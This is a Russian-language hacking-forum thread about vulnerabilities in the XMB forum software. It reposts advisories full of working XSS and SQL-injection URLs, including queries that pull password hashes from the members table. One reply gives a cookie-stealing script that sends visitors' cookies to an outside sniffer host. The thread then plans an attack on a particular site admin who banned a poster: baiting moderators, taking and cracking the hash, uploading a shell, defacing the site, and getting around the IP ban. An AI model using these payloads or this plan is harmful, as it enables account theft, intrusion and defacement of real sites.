Обыскал форум через поиск по запросу Xmb выдал только 1 статью да и то не по уязвимости, неужели у этого форума совсем нет уязвимостей ? на секьюрити лаб все статьи по старым форумам, 1.5, 1.6 1.8 если не увидел чего .. ткните носом
Форум просто не сильнопопулярный по этому особо нечего и нет.... Я поищу если что найду стоящие то выложу.... Тебя какие версий интересуют ?
Code: Программа: XMB 1.9.3 и более ранние версии Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует при обработке поля "Your Current Mood" при регистрации учетной записи. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта. Программа: XMB 1.9.3, возможно более ранние версии Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения Программа: XMB Forum 1.9.3 и более ранние версии Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей. Уязвимость существует при обработке входных данных в параметре username сценария u2u.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример: http://[host]/u2u.php?action=send&username=[code] Программа: XMB Forum 1.8 Partagium Final SP2 (Build: 2003100518) Опасность: Средняя Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может выполнить SQL команды на основной базе данных и выполнить XSS нападение. Пример/Эксплоит: http://[target]/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript> http://[target]/xmb18sp2/member.php?action=viewpro&member=x<%73cript>al ert (document.cookie);</%73cript> http://[target]/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie); </%73cript> http://[target]/xmb18sp2/editprofile.php? user=x"><%73cript>alert (document.cookie);</%73cript> http://[target]/xmb18sp2/viewthread.php?tid=1&ppp=x<%73cript>alert (document.cookie);</%73cript> http://[target] /xmb18sp2/misc.php?action=list&order=postnum&desc=x http://[target]/xmb18sp2/misc.php?action=list&order=postnum&desc=x<%73cript>alert (document.cookie);</%73cript> http://[target]/xmb18sp2/forumdisplay.php?fid=1&tpp=x<%73cript>alert (document.cookie);</%73cript> http://[target]/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x<%73cript>ale rt (document.cookie);</%73cript> text1 [align=center onmouseover=alert(document.cookie);] text2 [/align] text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2 http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,username FROM xmb_members WHERE uid=1 LIMIT 1/* http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/* Программа: XMB Forum 1.8 Partagium SP3; 1.9 Nexus Beta Опасность: Средняя Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. Пример/Эксплоит: http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar http://localhost/xmb19beta/member.php?action=viewpro&m ember=waraxe&restrict=<body%20onload=alert(document.cookie);> http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9 http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%2 0SELECT%20username,null,9 http://localhost/xmb19beta/misc.php?action=search&restrict=<body%20onload=alert(document.cookie);> http://localhost/xmb19beta/misc.php?act ion=search&restrict=%20private=-99%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null, 1%20LIMIT%201%20/* http://localhost/xmb19beta/today. php?restrict=<body%20onload=alert(document.cookie);> http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<body%20onload=alert(document.cookie);> http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=alert(document.cookie);> http://localhost/xmb19beta/editprofile.php?u ser=notexist_foobar&u2uheader=<body%20onload=alert(document.cookie);> http://localhost/xmb19beta/u2u.php?folder=foobar"><body%20onload=alert(document.cookie);> http ://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body%20onload=alert(document.cookie);> http://localhost/xmb19beta/stats.php?action=view&replymost=" ></textarea><body%20onload=alert(document.cookie);> http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body%20onload=alert(document.cookie);> htt p://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body%20onload=alert(document.cookie);> http://localhost/xmb19beta/post.php?action=newthre ad&fid=1&icons=<body%20onload=alert(document.cookie);> http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<body%20onload=alert(document.cookie);> http://l ocalhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<body%20onload=alert(document.cookie);> http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<body%20onload= alert(document.cookie);> http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<body%20onload=alert(document.cookie);> http://localhost/xmb19beta/forumdispla y.php?fid=1&forumdisplay=<body%20onload=alert(document.cookie);> Программа: XMB Forum 1.9.1 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важной информации пользователей. Уязвимость существует из-за недостаточной фильтрации данных в параметре Mood и поле Send To. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Это ещё не все Code: http://www.securitylab.ru/vulnerability/page1_670.php?page=1_670&arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=xmb&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y в иксМБ много иксс! Можно спокойно мд5 угнать
на Xmb есть очень хорошоя SQL-инъекция котороя существует из за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php .
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения А какой запрос делать чтобы хэш увидеть у первого id ??
вот вот я тоже бы хотел это узнать, хотя я в этом сильно сомневаюсь, похожая описанной уязвимости была насколько я помню в phpBB 2.0.6 , не думаю что xmb не исправило эту багу
да кстати версия которая меня интерисует 1.9.5 а по поводу распространенности, то считаю его зря подзабыли орум классный и по функциональности давно обогнал phpBB в стандартной комплектации
Зарегайся на форуме и проверь xss Code: http://[адресс форума]/u2u.php?action=send&username=<script>alert('lol')</script> если алерт пашет то пиши в ПМ админу типа чё за косяк Code: http://[адресс форума]/u2u.php?action=send&username=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Есть в инете специальные скрипты но можно немного скрипт сниффа приныкать но можно лучше сныкать Code: http://[адресс форума]/u2u.php?action=send&username=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru%2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E Админ по ссылке зайдёт и ты его хэш забираешь и разшифровываешь Кстати ПС тебе придётся ждать долго чтоб он записал свои данные в лог тебе надо будет ждать и палить лог http://antichat.ru/sniff/log.php Но можно на хостинге свой поставить и чтобы он в текстовик их писал так удобней будет Вся эта шняга на 1.8 точно пашет ну ещё должна на 1.9.3
в этом то вся и проблема, админ не ламер в принципе, рега закрыта и дает регится он только проверенным пользователям, может можно как нибудь шелл залить ?
не думаю я что у него пройдет xss но попробовать можно если подскажете какую нить рабочую... те что были описаны ранее не работают
Дружище... не парься, ксс найдешь, через пм катай этот ксс админу и всем модерам, один модер по любому попадется, а там редкатируй все разделы форума, и вставляй ксс а там админ попадется вот и усе, получил хешь, через онлайн базу мд5 получил пасс и заходи в админку и лей шелл и дефайс его =)
проблема в том что через ПМ я ничего послать не могу, т.к. админ разрешает регится только проверенным пользователям, а поскольку он зациклен на безопасности, (мания преследования у него) то это практически не реально, могут ли быть другие способы ?
защита от таких как я тут.. а там где закрыта рега , где в чат входишь и тебя банят только из за того что ты из какого то определенного города, то это уже дескриминация по территориальному признаку и мания преследования
Если ты не в курсе - любой сайт - это частная вирт. собственность, и тут уже право админа - пускать тебя на свой ресурс, открывать или закрывать регистрацию...etc. Советую заработать там себе репутацию, втереться в доверие, и хакнуть по полной) Соц. инженерией пользуйся.
Ладно допустим это частная собственность и я бы может не принял бы это так близко если перед тем как меня забанили меня не обвинили в том чего я не делал, по сути за это и забанили, за то чего я не делал.. но это так отступление.... вернемся к нашим баранам... если пользоваться СИ и втерется в доверие, для этого нужен доступ, а там я забанен по ай пи, все бы ничего если бы не корпоративный прокси через который идет выход в нет и возможности сменить прокси обычным методом нет... поэтому нужно прибегнуть к соксификации из этого возник следующий вопрос... на серваке стоит Kerio Winroute Firewall держит ли он что нибудь из (CONNECT, Socks4, Socks5) если да то где можно почитать про настройку, если нет то как можно прикрутить эти вещи к Kerio и можно ли, а если нет то какая есть альтернатива прокси серверу и как его можно настроить (читать : где найти как настроить, поисковики просьба не предлагать, я уже облазил что можно ничего толкового не нашел, или просто не знал что искать)
Чёт я ни хрена не догнал,где там ошибка в обработке кук в today.php.Или в версиях 1.9.1 и 1.9.2 их нет?